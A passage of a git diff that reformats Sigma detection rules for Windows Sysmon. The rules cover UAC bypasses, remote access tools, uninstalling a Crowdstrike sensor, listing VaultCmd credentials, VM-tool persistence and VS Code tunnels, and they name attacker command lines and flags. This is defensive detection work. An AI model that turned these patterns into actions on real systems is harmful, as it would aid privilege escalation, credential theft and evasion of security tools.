https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml index 1319f89d3..56650d0eb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml @@ -1,8 +1,7 @@ title: UAC Bypass via Windows Firewall Snap-In Hijack id: e52cb31c-10ed-4aea-bcb7-593c9f4a315b status: test -description: Detects attempts to bypass User Account Control (UAC) by hijacking the - Microsoft Management Console (MMC) Windows Firewall snap-in +description: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in references: - https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack author: Tim Rauch diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_icmluautil.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_icmluautil.yml index e9acee70e..863cb1721 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_icmluautil.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_icmluautil.yml @@ -25,8 +25,8 @@ detection: - /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} - /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} filter: - - Image|endswith: \WerFault.exe - - OriginalFileName: WerFault.exe + - Image|endswith: \WerFault.exe + - OriginalFileName: WerFault.exe condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml index 2a2f2bd26..00ef5c5f5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml @@ -24,7 +24,7 @@ detection: - High - System ParentImage|endswith: \AppData\Local\Temp\pkgmgr.exe - CommandLine: '"C:\Windows\system32\msconfig.exe" -5' + CommandLine: '"C:\Windows\system32\msconfig.exe" -5' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml index b0dc79918..16bd587e1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using NTFS Reparse Point - Process id: 39ed3c80-e6a1-431b-9df3-911ac53d08a7 status: test -description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe - DLL hijacking (UACMe 36) +description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -21,18 +20,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\' - CommandLine|endswith: \AppData\Local\Temp\update.msu + CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\' + CommandLine|endswith: \AppData\Local\Temp\update.msu IntegrityLevel: - High - System selection2: - ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart - /add-package /packagepath:"C:\Windows\system32\pe386" /ignorecheck' + ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart /add-package /packagepath:"C:\Windows\system32\pe386" /ignorecheck' IntegrityLevel: - High - System - CommandLine|contains|all: + CommandLine|contains|all: - C:\Users\ - \AppData\Local\Temp\ - \dismhost.exe { diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml index a818c0f19..a3eee676f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using PkgMgr and DISM id: a743ceba-c771-4d75-97eb-8a90f7f4844c status: test -description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe - 23) +description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_sdclt.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_sdclt.yml index c3a758aac..e1f0bbeee 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_sdclt.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_sdclt.yml @@ -1,8 +1,7 @@ title: Potential UAC Bypass Via Sdclt.EXE id: 40f9af16-589d-4984-b78d-8c2aec023197 status: test -description: A General detection for sdclt being spawned as an elevated process. This - could be an indicator of sdclt being used for bypass UAC techniques. +description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/6 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_winsat.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_winsat.yml index 307eece20..025c93e26 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_winsat.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_winsat.yml @@ -1,8 +1,7 @@ title: UAC Bypass Abusing Winsat Path Parsing - Process id: 7a01183d-71a2-46ad-ad5c-acd989ac1793 status: test -description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe - (UACMe 52) +description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wmp.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wmp.yml index 50493521a..6ed8b5bb5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wmp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wmp.yml @@ -1,8 +1,7 @@ title: UAC Bypass Using Windows Media Player - Process id: 0058b9e5-bcd7-40d4-9205-95ca5a16d7b2 status: test -description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll - (UACMe 32) +description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -27,8 +26,7 @@ detection: - System selection2: Image: C:\Windows\System32\cmd.exe - ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" - /s' + ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s' IntegrityLevel: - High - System diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wsreset.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wsreset.yml index 6c009ce3a..5d96e75e6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wsreset.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wsreset.yml @@ -1,18 +1,16 @@ title: Bypass UAC via WSReset.exe id: d797268e-28a9-49a7-b9a8-2f5039011c5c related: - - id: bdc8918e-a1d5-49d1-9db7-ea0fd91aa2ae - type: obsoletes + - id: bdc8918e-a1d5-49d1-9db7-ea0fd91aa2ae + type: obsoletes status: test -description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries - use this technique to execute privileged processes. +description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. references: - https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/ - https://www.activecyber.us/activelabs/windows-uac-bypass - https://twitter.com/ReaQta/status/1222548288731217921 -author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, - Florian Roth +author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth date: 2019/10/24 modified: 2022/05/13 tags: @@ -30,8 +28,8 @@ detection: selection: ParentImage|endswith: \wsreset.exe filter: - - Image|endswith: \conhost.exe - - OriginalFileName: CONHOST.EXE + - Image|endswith: \conhost.exe + - OriginalFileName: CONHOST.EXE condition: process_creation and (selection and not filter) falsepositives: - Unknown sub processes of Wsreset.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_ultravnc.yml b/sigma/sysmon/process_creation/proc_creation_win_ultravnc.yml index b5a34f668..8b0a28999 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ultravnc.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ultravnc.yml @@ -1,9 +1,7 @@ title: Use of UltraVNC Remote Access Software id: 145322e4-0fd3-486b-81ca-9addc75736d8 status: test -description: An adversary may use legitimate desktop support and remote access software,to - establish an interactive command and control channel to target systems within - networks +description: An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks references: - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md author: frack113 @@ -20,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: VNCViewer - - Product: UltraVNC VNCViewer - - Company: UltraVNC - - OriginalFileName: VNCViewer.exe + - Description: VNCViewer + - Product: UltraVNC VNCViewer + - Company: UltraVNC + - OriginalFileName: VNCViewer.exe condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_ultravnc_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_ultravnc_susp_execution.yml index 5a23b7e30..ba764010e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ultravnc_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ultravnc_susp_execution.yml @@ -1,9 +1,7 @@ title: Suspicious UltraVNC Execution id: 871b9555-69ca-4993-99d3-35a59f9f3599 status: test -description: Detects suspicious UltraVNC command line flag combination that indicate - a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon - threat group) +description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group) references: - https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine @@ -25,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-autoreconnect ' - '-connect ' - '-id:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml b/sigma/sysmon/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml index 548afec8c..ba2d8cf1f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml @@ -1,8 +1,7 @@ title: Uninstall Crowdstrike Falcon Sensor id: f0f7be61-9cf5-43be-9836-99d6ef448a18 status: test -description: Adversaries may disable security tools to avoid possible detection of - their tools and activities by uninstalling Crowdstrike Falcon +description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: frack113 @@ -20,13 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \WindowsSensor.exe - ' /uninstall' - ' /quiet' condition: process_creation and selection falsepositives: - - Administrator might leverage the same command line for debugging or other purposes. - However this action must be always investigated + - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml index af0d3cc7b..e89ab1281 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml @@ -1,11 +1,10 @@ title: Uncommon Userinit Child Process id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 related: - - id: 21d856f9-9281-4ded-9377-51a1a6e2a432 - type: similar + - id: 21d856f9-9281-4ded-9377-51a1a6e2a432 + type: similar status: test -description: Detects uncommon "userinit.exe" child processes, which could be a sign - of uncommon shells or login scripts used for persistence. +description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence. references: - https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html - https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core @@ -28,29 +27,30 @@ detection: filter_main_explorer: Image|endswith: :\WINDOWS\explorer.exe filter_optional_logonscripts: - CommandLine|contains: + CommandLine|contains: - netlogon.bat - UsrLogon.cmd filter_optional_windows_core: - CommandLine: PowerShell.exe + # Note: This filter is mandatory on Windows Core machines as the default shell spawned by "userinit" is "powershell.exe". + # https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core + CommandLine: PowerShell.exe filter_optional_proquota: Image|endswith: - :\Windows\System32\proquota.exe - :\Windows\SysWOW64\proquota.exe filter_optional_citrix: Image|endswith: - - :\Program Files (x86)\Citrix\HDX\bin\cmstart.exe - - :\Program Files (x86)\Citrix\HDX\bin\icast.exe + # As reported by https://github.com/SigmaHQ/sigma/issues/4569 + - :\Program Files (x86)\Citrix\HDX\bin\cmstart.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command + - :\Program Files (x86)\Citrix\HDX\bin\icast.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command - :\Program Files (x86)\Citrix\System32\icast.exe - - :\Program Files\Citrix\HDX\bin\cmstart.exe - - :\Program Files\Citrix\HDX\bin\icast.exe + - :\Program Files\Citrix\HDX\bin\cmstart.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command + - :\Program Files\Citrix\HDX\bin\icast.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command - :\Program Files\Citrix\System32\icast.exe filter_optional_image_null: - Image: null - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + Image: + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Legitimate logon scripts or custom shells may trigger false positives. Apply - additional filters accordingly. + - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly. level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_vaultcmd_list_creds.yml b/sigma/sysmon/process_creation/proc_creation_win_vaultcmd_list_creds.yml index 5c1bafd11..f8410ffb0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vaultcmd_list_creds.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vaultcmd_list_creds.yml @@ -1,8 +1,7 @@ title: Windows Credential Manager Access via VaultCmd id: 58f50261-c53b-4c88-bd12-1d71f12eda4c status: test -description: List credentials currently stored in Windows Credential Manager via the - native Windows utility vaultcmd.exe +description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd author: frack113 @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \VaultCmd.exe - - OriginalFileName: VAULTCMD.EXE + - Image|endswith: \VaultCmd.exe + - OriginalFileName: VAULTCMD.EXE selection_cli: - CommandLine|contains: '/listcreds:' + CommandLine|contains: '/listcreds:' condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_verclsid_runs_com.yml b/sigma/sysmon/process_creation/proc_creation_win_verclsid_runs_com.yml index ad0bf35e2..7d11c5114 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_verclsid_runs_com.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_verclsid_runs_com.yml @@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \verclsid.exe - - OriginalFileName: verclsid.exe + - Image|endswith: \verclsid.exe + - OriginalFileName: verclsid.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /S - /C condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_virtualbox_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_virtualbox_execution.yml index 1ba6b534a..3504185b0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_virtualbox_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_virtualbox_execution.yml @@ -1,9 +1,7 @@ title: Detect Virtualbox Driver Installation OR Starting Of VMs id: bab049ca-7471-4828-9024-38279a4c04da status: test -description: Adversaries can carry out malicious operations using a virtual instance - to avoid detection. This rule is built to detect the registration of the Virtualbox - driver or start of a Virtualbox VM. +description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM. references: - https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/ - https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/ @@ -23,12 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: + CommandLine|contains: - VBoxRT.dll,RTR3Init - VBoxC.dll - VBoxDrv.sys selection_2: - CommandLine|contains: + CommandLine|contains: - startvm - controlvm condition: process_creation and (1 of selection_*) @@ -38,7 +36,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - This may have false positives on hosts where Virtualbox is legitimately being - used for operations + - This may have false positives on hosts where Virtualbox is legitimately being used for operations level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml index 20ce6df1b..bd58d36fc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml @@ -1,14 +1,10 @@ title: Suspicious VBoxDrvInst.exe Parameters id: b7b19cb6-9b32-4fc4-a108-73f19acfe262 status: test -description: 'Detect VBoxDrvInst.exe run with parameters allowing processing INF file. - +description: | + Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. - - For example one could use this technique to obtain persistence via modifying one - of Run or RunOnce registry keys - - ' + For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys references: - https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml - https://twitter.com/pabraeken/status/993497996179492864 @@ -28,7 +24,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \VBoxDrvInst.exe - CommandLine|contains|all: + CommandLine|contains|all: - driver - executeinf condition: process_creation and selection @@ -38,7 +34,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation - process + - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml index ce81fee4c..794b9e3f2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml @@ -1,11 +1,10 @@ title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d related: - - id: 236d8e89-ed95-4789-a982-36f4643738ba - type: derived + - id: 236d8e89-ed95-4789-a982-36f4643738ba + type: derived status: experimental -description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and - "set" flag to setup a specific script to run for a specific VM state +description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ - https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/ @@ -24,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \VMwareToolBoxCmd.exe - - OriginalFileName: toolbox-cmd.exe + - Image|endswith: \VMwareToolBoxCmd.exe + - OriginalFileName: toolbox-cmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' script ' - ' set ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml b/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml index c9c414567..a4e3fc417 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml @@ -1,12 +1,10 @@ title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script id: 236d8e89-ed95-4789-a982-36f4643738ba related: - - id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d - type: derived + - id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d + type: derived status: experimental -description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and - "set" flag to setup a specific script that's located in a potentially suspicious - location to run for a specific VM state +description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ author: Nasreddine Bencherchali (Nextron Systems) @@ -24,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_bin_img: - - Image|endswith: \VMwareToolBoxCmd.exe - - OriginalFileName: toolbox-cmd.exe + - Image|endswith: \VMwareToolBoxCmd.exe + - OriginalFileName: toolbox-cmd.exe selection_bin_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' script ' - ' set ' selection_susp_paths: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Temp\ - :\Windows\System32\Tasks\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml index dba406c06..9fafd88c6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml @@ -1,8 +1,7 @@ title: VMToolsd Suspicious Child Process id: 5687f942-867b-4578-ade7-1e341c46e99a status: experimental -description: Detects suspicious child process creations of VMware Tools process which - may indicate persistence setup +description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ - https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png @@ -25,37 +24,37 @@ detection: selection_parent: ParentImage|endswith: \vmtoolsd.exe selection_img: - - Image|endswith: - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - OriginalFileName: - - Cmd.Exe - - cscript.exe - - MSHTA.EXE - - PowerShell.EXE - - pwsh.dll - - REGSVR32.EXE - - RUNDLL32.EXE - - wscript.exe + - Image|endswith: + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - OriginalFileName: + - Cmd.Exe + - cscript.exe + - MSHTA.EXE + - PowerShell.EXE + - pwsh.dll + - REGSVR32.EXE + - RUNDLL32.EXE + - wscript.exe filter_main_vmwaretools_script: Image|endswith: \cmd.exe - CommandLine|contains: + CommandLine|contains: - \VMware\VMware Tools\poweron-vm-default.bat - \VMware\VMware Tools\poweroff-vm-default.bat - \VMware\VMware Tools\resume-vm-default.bat - \VMware\VMware Tools\suspend-vm-default.bat filter_main_empty: Image|endswith: \cmd.exe - CommandLine: '' + CommandLine: '' filter_main_null: Image|endswith: \cmd.exe - CommandLine: null + CommandLine: condition: process_creation and (all of selection* and not 1 of filter_main_*) falsepositives: - Legitimate use by VM administrator diff --git a/sigma/sysmon/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml b/sigma/sysmon/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml index daf0a8bef..9c1084511 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml @@ -1,9 +1,7 @@ title: Potentially Suspicious Child Process Of VsCode id: 5a3164f2-b373-4152-93cf-090b13c12d27 status: experimental -description: Detects uncommon or suspicious child processes spawning from a VsCode - "code.exe" process. This could indicate an attempt of persistence via VsCode tasks - or terminal profiles. +description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. references: - https://twitter.com/nas_bench/status/1618021838407495681 - https://twitter.com/nas_bench/status/1618021415852335105 @@ -37,7 +35,7 @@ detection: - \powershell.exe - \pwsh.exe - \cmd.exe - CommandLine|contains: + CommandLine|contains: - Invoke-Expressions - IEX - Invoke-Command @@ -49,13 +47,12 @@ detection: - cscript selection_children_paths: Image|contains: + # Add more suspicious locations - :\Users\Public\ - :\Windows\Temp\ - :\Temp\ condition: process_creation and (selection_parent and 1 of selection_children_*) falsepositives: - - In development environment where VsCode is used heavily. False positives may - occur when developers use task to compile or execute different types of code. - Remove or add processes accordingly + - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_execution.yml index 22f4e4fcf..05f59efed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_execution.yml @@ -1,8 +1,7 @@ title: Visual Studio Code Tunnel Execution id: 90d6bd71-dffb-4989-8d86-a827fedd6624 status: experimental -description: Detects Visual Studio Code tunnel execution. Attackers can abuse this - functionality to establish a C2 channel +description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -21,17 +20,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_only_tunnel: - OriginalFileName: null - CommandLine|endswith: .exe tunnel + OriginalFileName: + CommandLine|endswith: .exe tunnel selection_tunnel_args: - CommandLine|contains|all: + CommandLine|contains|all: - .exe tunnel - '--name ' - --accept-server-license-terms selection_parent_tunnel: ParentCommandLine|endswith: ' tunnel' Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - '/d /c ' - \servers\Stable- - code-server.cmd diff --git a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml index 7386d97d4..dead7a837 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml @@ -1,9 +1,7 @@ title: Visual Studio Code Tunnel Shell Execution id: f4a623c2-4ef5-4c33-b811-0642f702c9f1 status: experimental -description: Detects the execution of a shell (powershell, bash, wsl...) via Visual - Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel - and execute arbitrary commands on the system. +description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this 